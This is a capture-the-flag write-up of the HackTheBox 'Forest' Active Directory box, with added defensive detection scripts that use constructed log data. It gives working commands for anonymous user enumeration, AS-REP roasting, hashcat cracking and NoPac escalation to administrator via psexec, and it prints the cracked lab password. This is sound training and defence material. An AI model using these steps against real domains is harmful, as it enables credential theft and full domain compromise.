Summary
An easy box containing an Active Directory environment with vulnerabilities such as:
- Kerberos AS-REP roasting
- NoPac vulnerability (NoPac relies on changing the sAMAccountName of a computer account to the name of a domain controller)
Setup
mkdir -p ~/ctf/HackTheBox/forest/scans; cd ~/ctf/HackTheBox/forest
IP Address: 10.10.10.161
echo "10.10.10.161 forest.htb" | sudo tee -a /etc/hosts
10.10.10.161 forest.htb
Enumeration
nmap -sC -sV -Pn -p- forest.htb -oN scans/nmap -vv
nmap -sC -sV -p- -vv -T5 --min-rate 2500 -oN scans/nmap_2 forest.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-10-06 15:48:22Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc syn-ack Microsoft Windows RPC
49686/tcp open msrpc syn-ack Microsoft Windows RPC
49705/tcp open msrpc syn-ack Microsoft Windows RPC
49974/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-10-06T08:49:15-07:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 2 (port 57085/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44587/udp): CLEAN (Timeout)
| Check 4 (port 2270/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-10-06T15:49:15
|_ start_date: 2024-10-06T08:20:41
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h15m22s, deviation: 4h02m31s, median: -4m39s
Using SMB enumeration with crackmapexec and a null-session (anonymous) login, we enumerate users:
cme smb 10.10.10.161 -u '' -p '' --users
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
marks
santi
Password spraying and brute-forcing did not work (using each username as its own password).
Kerberos ASREPRoast
AS-REP roasting targets user accounts that have the "Do not require Kerberos pre-authentication" attribute set. Without pre-authentication, an attacker can request a TGT for such a user from the Domain Controller (DC) without knowing the user's password. The DC replies with an AS-REP whose encrypted part is protected with the user's password-derived key, and that ciphertext can be cracked offline to recover the password.
GetNPUsers.py htb.local/ -usersfile user -format hashcat -outputfile hash_asrep -no-pass
Cracking the hash with hashcat: hashcat -m 18200 hash_asrep /usr/share/wordlists/rockyou.txt
We recover the credentials svc-alfresco:s3rvice
We check for known low-hanging fruit such as NoPac and PetitPotam.
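The defender's view of the step above, as an added example that is not part of the original writeup: an audit of which accounts have pre-authentication disabled (the condition GetNPUsers.py looks for) and a check over Event ID 4768 records for TGTs issued with no pre-authentication and RC4 encryption (the material hashcat mode 18200 cracks). The account flags and log records are constructed sample data, not pulled from htb.local.

```python
"""Defensive audit for AS-REP roasting exposure (added example; constructed data).

Check 1: accounts carrying DONT_REQ_PREAUTH in userAccountControl.
Check 2: Event ID 4768 (TGT requested) records with pre-auth type 0 and
RC4 (0x17) ticket encryption, the shape a roast leaves in the Security log.
"""
DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit: Kerberos pre-auth not required
ACCOUNTDISABLE = 0x2         # a disabled account cannot yield a usable password

# Constructed LDAP-style export: (sAMAccountName, userAccountControl). The flag
# values are illustrative, not taken from the real htb.local directory.
SAMPLE_ACCOUNTS = [
    ("Administrator", 0x10200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("svc-alfresco", 0x410200),  # ... | DONT_REQ_PREAUTH  -> roastable
    ("old-svc", 0x400202),       # DONT_REQ_PREAUTH but ACCOUNTDISABLE
    ("andy", 0x200),             # NORMAL_ACCOUNT only
]

def accounts_without_preauth(accounts, include_disabled=False):
    """Return account names whose UAC has DONT_REQ_PREAUTH set."""
    hits = []
    for name, uac in accounts:
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(name)
    return hits

# Constructed Security-log records keyed like the 4768 event fields.
# Status 0x0 = ticket issued, 0x19 = KDC_ERR_PREAUTH_REQUIRED (rejected request).
SAMPLE_4768 = [
    {"TargetUserName": "andy", "PreAuthType": 2, "TicketEncryptionType": 0x12,
     "Status": 0x0, "IpAddress": "10.10.14.5"},
    {"TargetUserName": "svc-alfresco", "PreAuthType": 0, "TicketEncryptionType": 0x17,
     "Status": 0x0, "IpAddress": "10.10.14.22"},
    {"TargetUserName": "marks", "PreAuthType": 0, "TicketEncryptionType": 0x17,
     "Status": 0x19, "IpAddress": "10.10.14.22"},
]

def suspicious_asrep_requests(events):
    """Flag TGTs actually issued with no pre-authentication and RC4 encryption."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["PreAuthType"] == 0 and e["TicketEncryptionType"] == 0x17
            and e["Status"] == 0x0]

if __name__ == "__main__":
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("likely roasted:", suspicious_asrep_requests(SAMPLE_4768))
```

Clearing the flag on every account that does not strictly need it, and enforcing AES-only Kerberos encryption where the environment allows, removes both halves of what this check detects.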
root flag
Credential Cache
A credential cache (or "ccache") holds Kerberos credentials while they remain valid, typically for the duration of the user's session, so that authenticating to multiple services (e.g. connecting to a web or mail server more than once) does not require contacting the KDC each time.
A credential cache usually contains one initial ticket, obtained using a password or another form of identity verification. If this ticket is a ticket-granting ticket, it can be used to obtain additional credentials without the password. Because the credential cache does not store the password, less long-term damage can be done to the user's account if the machine is compromised.
A credential cache stores a default client principal name, set when the cache is created. This is the name shown at the top of the klist output.
Using NoPac
python noPac.py htb.local/'svc-alfresco':'s3rvice' -dc-ip 10.10.10.161 -use-ldap
We obtain a Kerberos ticket (saved to a credential cache), which we then use with psexec.py:
psexec.py -dc-ip 10.10.10.161 -target-ip 10.10.10.161 -no-pass -k htb.local/Administrator@forest.htb.local
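On the detection side, as an added example (not code from the writeup or from noPac.py): the rename NoPac depends on is a computer account whose sAMAccountName suddenly matches a domain controller's name without the trailing "$". On the DC this is recorded as Event ID 4742 (a computer account was changed, with a new SAM Account Name) and 4781 (the name of an account was changed). The event records below are constructed samples whose field names only loosely mirror those events; FOREST is the DC name from the nmap output.

```python
"""Detection for the sAMAccountName rename that NoPac relies on (added example,
not the writeup's or tool's code; the events below are constructed samples).

Computer accounts end in '$'. NoPac renames a machine account so that its
sAMAccountName equals a domain controller's name without the '$'. Event IDs
4742 (computer account changed) and 4781 (account name changed) record this.
"""
DOMAIN_CONTROLLERS = {"FOREST"}  # the DC's computer name from the nmap output

def is_dc_name_collision(new_name, dcs=DOMAIN_CONTROLLERS):
    """True if an account name now matches a DC name, with or without '$'."""
    return new_name.rstrip("$").upper() in {d.rstrip("$").upper() for d in dcs}

def flag_nopac_renames(events, dcs=DOMAIN_CONTROLLERS):
    """Return (actor, old, new, reason) for computer renames worth alerting on."""
    findings = []
    for e in events:
        if e["EventID"] not in (4742, 4781):
            continue
        old, new = e.get("OldName", ""), e.get("NewName", "")
        if new in ("", "-"):
            continue  # 4742 reports '-' when SAM Account Name did not change
        if not old.endswith("$"):
            continue  # not a computer account; user renames are out of scope here
        if is_dc_name_collision(new, dcs):
            findings.append((e["SubjectUserName"], old, new, "renamed to DC name"))
        elif not new.endswith("$"):
            findings.append((e["SubjectUserName"], old, new, "computer account lost '$' suffix"))
    return findings

# Constructed samples: one benign rename, one user rename, two that should alert.
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserName": "helpdesk", "OldName": "WS01$", "NewName": "WS01-NEW$"},
    {"EventID": 4781, "SubjectUserName": "helpdesk", "OldName": "jdoe", "NewName": "jdoe2"},
    {"EventID": 4781, "SubjectUserName": "svc-alfresco", "OldName": "DESKTOP-K2A3$", "NewName": "FOREST"},
    {"EventID": 4742, "SubjectUserName": "svc-alfresco", "OldName": "WS02$", "NewName": "WS02"},
]

if __name__ == "__main__":
    for finding in flag_nopac_renames(SAMPLE_EVENTS):
        print(finding)
```

Beyond patching the DCs, setting ms-DS-MachineAccountQuota to 0 denies ordinary domain users the machine account the technique starts from.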
Wrap Up
- In this "Forest" box, enumeration reveals a Windows Active Directory environment with common services exposed, such as Kerberos and LDAP. Using AS-REP roasting, we cracked the password of the svc-alfresco account, which led to exploitation of the NoPac vulnerability and privilege escalation by obtaining a Kerberos ticket. With that ticket we gained administrator access to the Domain Controller and retrieved the root flag over a psexec connection.